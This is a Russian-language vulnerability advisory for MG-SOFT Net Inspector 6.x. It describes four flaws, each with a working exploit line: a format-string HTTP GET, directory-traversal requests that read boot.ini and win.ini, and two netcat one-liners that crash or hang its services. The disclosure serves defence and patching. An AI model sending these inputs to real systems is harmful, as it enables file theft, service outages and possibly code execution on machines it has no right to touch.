Программа: MG-SOFT Net Inspector 6.x

Найденные уязвимости позволяют удаленному злоумышленнику получить доступ к
конфиденциальной информации, осуществить DoS атаку и выполнить произвольный код
на целевой системе.

1) Уязвимость существует из-за ошибки форматирования строки в Net Inspector
HTTP Server (mghttpd). Удаленный пользователь может с помощью специально
сформированного HTTP GET запроса выполнить произвольный код на целевой системе.

Эксплоит:

GET /%n%n%s%s%n%n%n%s HTTP/1.0

2) Уязвимость существует из-за недостаточной обработки HTTP GET запросов в
Net Inspector HTTP Server (mghttpd). Удаленный пользователь может с помощью
специально сформированного HTTP GET запроса, содержащего символы обхода
каталога, просмотреть содержимое произвольных файлов на системе.

Эксплоит:

GET ../../../../boot.ini HTTP/1.0
GET \../..\../..\windows/win.ini HTTP/1.0

3) Уязвимость существует из-за ошибки в сервисе SNMP Trap Service
(MgWTrap3.exe) при обработке UDP запросов. Удаленный пользователь может с
помощью специально сформированного UDP пакета аварийно завершить работу службы.

Эксплоит:

echo|nc SERVER PORT -v -v -u

4) Уязвимость существует из-за ошибки в Net Inspector Server при обработке
сетевых пакетов. Удаленный пользователь может отправить специально
сформированный пакет на порт 5221/TCP и вызвать зависание службы.

Эксплоит:

echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии